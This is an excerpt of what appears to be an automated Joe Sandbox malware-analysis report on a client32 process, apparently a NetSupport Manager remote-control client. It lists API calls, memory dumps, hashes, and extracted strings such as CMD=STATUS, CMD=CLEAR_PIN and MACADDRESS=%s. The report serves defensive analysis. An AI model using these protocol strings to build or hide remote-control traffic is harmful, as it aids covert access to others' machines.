                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess$ErrorLastMessageSleep_memmove_memset_strrchrwsprintf
                                                                                                                        • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$redirect:
                                                                                                                        • API String ID: 118650250-3293259664
                                                                                                                        • Opcode ID: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
                                                                                                                        • Instruction ID: 8883845aa1adcb6b462271895c3eb4188d935db878da715d2f936e5278910226
                                                                                                                        • Opcode Fuzzy Hash: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
                                                                                                                        • Instruction Fuzzy Hash: 85B1D234E0195A9FDB06DF98CC90FEDB3B5AF89309F448154E82567380EB34A908CBD1
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 110430DC
                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                        • _free.LIBCMT ref: 110430FC
                                                                                                                        • _strncpy.LIBCMT ref: 1104312A
                                                                                                                        • _strncpy.LIBCMT ref: 11043167
                                                                                                                        • _strncpy.LIBCMT ref: 110431B2
                                                                                                                        • _strncpy.LIBCMT ref: 110431F2
                                                                                                                        • _strncpy.LIBCMT ref: 1104323B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strncpy$_free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1231584600-0
                                                                                                                        • Opcode ID: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
                                                                                                                        • Instruction ID: 3e0d8ed6fad75e9b70bada9a66dea6ffd8c5f444cdc47759be8d9c1188c0d16e
                                                                                                                        • Opcode Fuzzy Hash: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
                                                                                                                        • Instruction Fuzzy Hash: FB615DB5E047199FD760CFB9C884BCAFBF9BB55308F0049ADD58997200DAB4A980CF91
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 1101F1B1
                                                                                                                          • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
                                                                                                                        • GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
                                                                                                                        • _fputs.LIBCMT ref: 1101F313
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                                        • String ID: ChatPath$X
                                                                                                                        • API String ID: 2661292734-3955712077
                                                                                                                        • Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                        • Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
                                                                                                                        • Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                        • Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91
                                                                                                                        APIs
                                                                                                                        • __getptd_noexit.LIBCMT ref: 685BF872
                                                                                                                        • _siglookup.LIBCMT ref: 685BF899
                                                                                                                        • DecodePointer.KERNEL32(A117076C,685D7798,00000020,685C6C37,00000016,685BB35F,685D75F8,00000008), ref: 685BF8F1
                                                                                                                        • __lock.LIBCMT ref: 685BF918
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer__getptd_noexit__lock_siglookup
                                                                                                                        • String ID: x]h$|]h
                                                                                                                        • API String ID: 2847133137-3415710678
                                                                                                                        • Opcode ID: 913bd4a302714c4e65bd0d560bf3d389b66cbd6a91f30939e1e7b912537498f0
                                                                                                                        • Instruction ID: 6a423b2b62c717f89e4c26c9321ed3089e1d27427b47564b3484ad3124c820e5
                                                                                                                        • Opcode Fuzzy Hash: 913bd4a302714c4e65bd0d560bf3d389b66cbd6a91f30939e1e7b912537498f0
                                                                                                                        • Instruction Fuzzy Hash: 9641903DD00305EBDF08DF78C8A49ACB7B2FF6A354B90442AE821A7651D7B1D840CBA5
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,a0Zh,?), ref: 685969EB
                                                                                                                        • _free.LIBCMT ref: 68596A07
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 68596A1B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave_free
                                                                                                                        • String ID: FAILED_REASON$LICENSE$a3Zh
                                                                                                                        • API String ID: 2208350527-1175787811
                                                                                                                        • Opcode ID: 086ca56cc5ab5da6217e57da9c43ff2b84f6ab471592071ab0210d865d518beb
                                                                                                                        • Instruction ID: ac1de090c90bd4b24c09c012a49f2b574d1a8716ca1c4b368ad7bfa2d20d91c8
                                                                                                                        • Opcode Fuzzy Hash: 086ca56cc5ab5da6217e57da9c43ff2b84f6ab471592071ab0210d865d518beb
                                                                                                                        • Instruction Fuzzy Hash: E8412636904786ABDF018E7889546AFBBF6AF92384F954165DD999B300EB31DE0CC3D0
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68596D0A
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68596D72
                                                                                                                        • SetLastError.KERNEL32(00000078,?,6859B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 68596DCC
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,000000C8,74DEE010,?,6859B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 68596DD6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                        • API String ID: 199729137-1434219782
                                                                                                                        • Opcode ID: f8b5b48bf9d52e37d29461fc61608dc07eaf970f1c38197b50847c1b3ba6ff48
                                                                                                                        • Instruction ID: 0674a1ebc6fa08b114cc084c9108d48255173acde0e7423f15543c24412073e9
                                                                                                                        • Opcode Fuzzy Hash: f8b5b48bf9d52e37d29461fc61608dc07eaf970f1c38197b50847c1b3ba6ff48
                                                                                                                        • Instruction Fuzzy Hash: C9315C75A043999FDF21EF58C890AE9B7F8FB49305F5144EAEA9997200C6705DC8CF90
                                                                                                                        APIs
                                                                                                                        • _strtok.LIBCMT ref: 6859B941
                                                                                                                        • _free.LIBCMT ref: 6859B952
                                                                                                                        • _malloc.LIBCMT ref: 6859B970
                                                                                                                        • _free.LIBCMT ref: 6859B999
                                                                                                                        • _strtok.LIBCMT ref: 6859B9A5
                                                                                                                          • Part of subcall function 685A7F80: _memset.LIBCMT ref: 685A7F9F
                                                                                                                          • Part of subcall function 685A7F80: LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,6859B916,?,00000100,00000006,00000001), ref: 685A7FAC
                                                                                                                          • Part of subcall function 685A7F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685A7FCB
                                                                                                                          • Part of subcall function 685A7F80: _malloc.LIBCMT ref: 685A7FFB
                                                                                                                          • Part of subcall function 685A7F80: wsprintfA.USER32 ref: 685A807C
                                                                                                                          • Part of subcall function 685A7F80: _free.LIBCMT ref: 685A8110
                                                                                                                          • Part of subcall function 685A7F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 685A811C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$Library_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
                                                                                                                        • String ID: MACADDRESS=%s
                                                                                                                        • API String ID: 905297018-795797190
                                                                                                                        • Opcode ID: 3cb6843e09a2eda3a758dea4d9b5072d7ccd5de090e112039db481a1addf2959
                                                                                                                        • Instruction ID: 21c847bbd0635fab87172a86c61f57395ec0607bfd8cc4559090a5a2559a5cc2
                                                                                                                        • Opcode Fuzzy Hash: 3cb6843e09a2eda3a758dea4d9b5072d7ccd5de090e112039db481a1addf2959
                                                                                                                        • Instruction Fuzzy Hash: 1521BE75D8026467EB01A2745C85FFEB2AD8F95B08FC00294FD949F280FAB1DD0482D1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
                                                                                                                          • Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                        • _free.LIBCMT ref: 6859BCBA
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 6859BCEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                        • String ID: APPTYPE=%d$CMD=USERSTATUS$DEPT=%s$USER=%s
                                                                                                                        • API String ID: 3180605519-731630419
                                                                                                                        • Opcode ID: 5d4a91f6150d5361a5f9186fb579d58b425feeb3b5db5a0a2f31cabd42635760
                                                                                                                        • Instruction ID: 9a82cf1656c9452d65eca618102cadfb1609bae206420f3180e89e9225d958c6
                                                                                                                        • Opcode Fuzzy Hash: 5d4a91f6150d5361a5f9186fb579d58b425feeb3b5db5a0a2f31cabd42635760
                                                                                                                        • Instruction Fuzzy Hash: E02162BA940208BBDB00DBA5CC91FFFB77CDF84604F808548AE16A7144EB30AA1587E5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                          • Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
                                                                                                                          • Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090
                                                                                                                        • _free.LIBCMT ref: 6859AF0A
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 6859AF39
                                                                                                                          • Part of subcall function 685A7B60: _sprintf.LIBCMT ref: 685A7B77
                                                                                                                          • Part of subcall function 685A77E0: _free.LIBCMT ref: 685A77EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
                                                                                                                        • String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
                                                                                                                        • API String ID: 1628406020-2994292602
                                                                                                                        • Opcode ID: 892e281234f6473bb2959472ca80297a582671a34a95ef773a8f78f04b0eb075
                                                                                                                        • Instruction ID: 4a9545b6700c8e23bd4afdbfca98310cda60e884f096ac6c9a6e1bb61ca69042
                                                                                                                        • Opcode Fuzzy Hash: 892e281234f6473bb2959472ca80297a582671a34a95ef773a8f78f04b0eb075
                                                                                                                        • Instruction Fuzzy Hash: DF21627A940108BBCB11DBE4CC91FFFBB7C9B94604F904148EA02B7244EB30AE5687E4
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 685A5CBF
                                                                                                                          • Part of subcall function 685A33A0: wsprintfA.USER32 ref: 685A34FD
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __vswprintf_memsetwsprintf
                                                                                                                        • String ID: 226546$CLIENT_NAME=%s$CMD=CLEAR_PIN$PIN=%s$PINserver
                                                                                                                        • API String ID: 518437271-364928423
                                                                                                                        • Opcode ID: 2a83d22bae4ca295b005445554e020a375a34d2fb1597c9142aa2b8f48517b7a
                                                                                                                        • Instruction ID: 87bf498cc7594ea23bf686710cdccebbedf05ac24f80792fd81c736b92ae0aad
                                                                                                                        • Opcode Fuzzy Hash: 2a83d22bae4ca295b005445554e020a375a34d2fb1597c9142aa2b8f48517b7a
                                                                                                                        • Instruction Fuzzy Hash: ED214875D00218AADB50DB788C81FEEB7B9AB84214F9081D9F95DE7181EF305E858F74
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 685B7960
                                                                                                                          • Part of subcall function 685BF4BC: __mtinitlocknum.LIBCMT ref: 685BF4D2
                                                                                                                          • Part of subcall function 685BF4BC: __amsg_exit.LIBCMT ref: 685BF4DE
                                                                                                                          • Part of subcall function 685BF4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,685B6E81,0000000D), ref: 685BF4E6
                                                                                                                        • InterlockedDecrement.KERNEL32(00000000), ref: 685B7972
                                                                                                                        • _free.LIBCMT ref: 685B7987
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • __lock.LIBCMT ref: 685B79A0
                                                                                                                        • ___removelocaleref.LIBCMT ref: 685B79AF
                                                                                                                        • ___freetlocinfo.LIBCMT ref: 685B79C8
                                                                                                                        • _free.LIBCMT ref: 685B79E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 556454624-0
                                                                                                                        • Opcode ID: 25cecdea0503b95306d972855dcf6e7eae7708cf6fa6d872a3b71aa226b00dbd
                                                                                                                        • Instruction ID: 3e486e7ca42d2cf214fb69cd9c9074a118e7d7ad972570e6219f1a43b1f2ec45
                                                                                                                        • Opcode Fuzzy Hash: 25cecdea0503b95306d972855dcf6e7eae7708cf6fa6d872a3b71aa226b00dbd
                                                                                                                        • Instruction Fuzzy Hash: 5511A039501704DBDB209F788524B6E73F5AF60724FE04519E4B5EB1D0EB34CD80C6A4
                                                                                                                        APIs
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 1100B2A0
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 1100B2D9
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 1100B2F8
                                                                                                                          • Part of subcall function 1100A200: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100A21E
                                                                                                                          • Part of subcall function 1100A200: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A248
                                                                                                                          • Part of subcall function 1100A200: GetLastError.KERNEL32 ref: 1100A250
                                                                                                                          • Part of subcall function 1100A200: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A264
                                                                                                                          • Part of subcall function 1100A200: CloseHandle.KERNEL32(00000000), ref: 1100A26B
                                                                                                                        • waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B308
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1100B30F
                                                                                                                        • _free.LIBCMT ref: 1100B318
                                                                                                                        • _free.LIBCMT ref: 1100B31E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
